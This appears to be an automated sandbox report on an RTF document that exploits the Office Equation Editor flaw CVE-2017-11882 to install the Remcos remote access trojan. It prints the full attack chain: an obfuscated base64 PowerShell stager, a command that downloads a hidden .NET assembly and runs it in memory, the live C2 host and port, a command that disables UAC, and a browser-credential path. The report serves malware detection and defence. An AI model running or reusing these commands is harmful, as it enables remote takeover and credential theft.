

Windows Analysis Report
SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf

Overview

General Information

Sample name: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf
Analysis ID: 1505518
MD5: 124bfb183c9b3f3b757fa9559967ab95
SHA1: e2004e5b5803b0ab65c9b8142808f9367a9b1c8a
SHA256: 1a7f73810fe77606fa0b04f8425407e39b2c6ba612cb287d56b7e46506781840
Tags: rtf

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell download and load assembly
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Document exploit detected (process start blacklist hit)
Found Tor onion address
Injects a PE file into a foreign processes
Installs new ROOT certificates
Maps a DLL or memory area into another process
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3568 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3616 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3756 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3800 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? 
?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?TwBm? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?ZwBl? ? ? ? ?C? ? ? ? ?? ? ? ? ?M? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? 
? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?ZwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?Kw? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?u? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BM? ? ? ? ?GU? ? ? ? ?bgBn? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?EM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?FM? ? ? ? ?dQBi? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBD? ? ? ? ?G8? ? ? ? ?bgB2? ? ? ? ?GU? ? ? ? ?cgB0? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?EY? ? ? ? ?cgBv? ? ? ? ?G0? ? ? ? ?QgBh? ? ? ? 
?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?EM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GQ? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBS? ? ? ? ?GU? ? ? ? ?ZgBs? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?Gk? ? ? ? ?bwBu? ? ? ? ?C4? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?Ew? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BU? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?Cg? ? ? ? ?JwBk? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GI? ? ? ? ?LgBJ? ? ? ? ?E8? ? ? ? ?LgBI? ? ? ? ?G8? ? ? ? ?bQBl? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?bQBl? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bv? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B0? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?TQBl? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bv? ? ? ? ?GQ? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?FY? ? ? ? ?QQBJ? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgB2? ? ? ? ?G8? ? ? ? ?awBl? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bu? ? ? ? ?HU? ? ? ? ?b? ? ? ? ?Bs? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?G8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?Fs? ? ? ? ?XQBd? ? ? ? ?C? ? ? ? ?? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?HQ? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? 
? ? ?RwBG? ? ? ? ?EY? ? ? ? ?UgBF? ? ? ? ?Fc? ? ? ? ?Lw? ? ? ? ?1? ? ? ? ?DM? ? ? ? ?Lw? ? ? ? ?0? ? ? ? ?Dg? ? ? ? ?MQ? ? ? ? ?u? ? ? ? ?DE? ? ? ? ?N? ? ? ? ?? ? ? ? ?y? ? ? ? ?C4? ? ? ? ?OQ? ? ? ? ?z? ? ? ? ?DI? ? ? ? ?Lg? ? ? ? ?1? ? ? ? ?Dg? ? ? ? ?Lw? ? ? ? ?v? ? ? ? ?Do? ? ? ? ?c? ? ? ? ?B0? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?Cw? ? ? ? ?JwBS? ? ? ? ?GU? ? ? ? ?ZwBB? ? ? ? ?HM? ? ? ? ?bQ? ? ? ? ?n? ? ? ? ?Cw? ? ? ? ?Jw? ? ? ? ?n? ? ? ? ?Ck? ? ? ? ?KQ? ? ? ? ?=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 3900 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GFFREW/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
            • RegAsm.exe (PID: 4008 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 3184 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\grmnuvnmumxdrrgkqp" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 3200 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\rtrfuoyfiupqcguozzwaq" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 3216 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\towqvgihwchvemqsikjctbjd" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 3232 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\towqvgihwchvemqsikjctbjd" MD5: 8FE9545E9F72E460723F484C304314AD)
    • EQNEDT32.EXE (PID: 904 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "dremom2.duckdns.org:2201:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-OT0ZCG", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf
Rule: INDICATOR_RTF_MalVer_Objects
Description: Detects RTF documents with a non-standard version and embedding one of the objects mostly observed in exploit documents.
Author: ditekSHen
Strings:
  • 0x1b9e:$obj2: \objdata
  • 0x1b88:$obj3: \objupdate
  • 0x1b60:$obj5: \objautlink
Source / Rule / Description / Author:
  • 00000008.00000002.875009514.0000000000539000.00000004.00000020.00020000.00000000.sdmp / JoeSecurity_Remcos / Yara detected Remcos RAT / Joe Security
  • 00000008.00000002.875009514.0000000000521000.00000004.00000020.00020000.00000000.sdmp / JoeSecurity_Remcos / Yara detected Remcos RAT / Joe Security
  • 00000008.00000002.875009514.0000000000505000.00000004.00000020.00020000.00000000.sdmp / JoeSecurity_Remcos / Yara detected Remcos RAT / Joe Security
  • 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp / JoeSecurity_Keylogger_Generic / Yara detected Keylogger Generic / Joe Security
  • 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp / JoeSecurity_Remcos / Yara detected Remcos RAT / Joe Security
Source / Rule / Description / Author:
  • 8.2.RegAsm.exe.400000.0.unpack / JoeSecurity_Keylogger_Generic / Yara detected Keylogger Generic / Joe Security
  • 8.2.RegAsm.exe.400000.0.unpack / JoeSecurity_Remcos / Yara detected Remcos RAT / Joe Security
  • 8.2.RegAsm.exe.400000.0.unpack / JoeSecurity_UACBypassusingCMSTP / Yara detected UAC Bypass using CMSTP / Joe Security
  • 8.2.RegAsm.exe.400000.0.unpack / Windows_Trojan_Remcos_b296e965 / unknown / unknown
    Strings:
    • 0x6aab8:$a1: Remcos restarted by watchdog!
    • 0x6b030:$a3: %02i:%02i:%02i:%03i
  • 8.2.RegAsm.exe.400000.0.unpack / REMCOS_RAT_variants / unknown / unknown
    Strings:
    • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
    • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
    • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
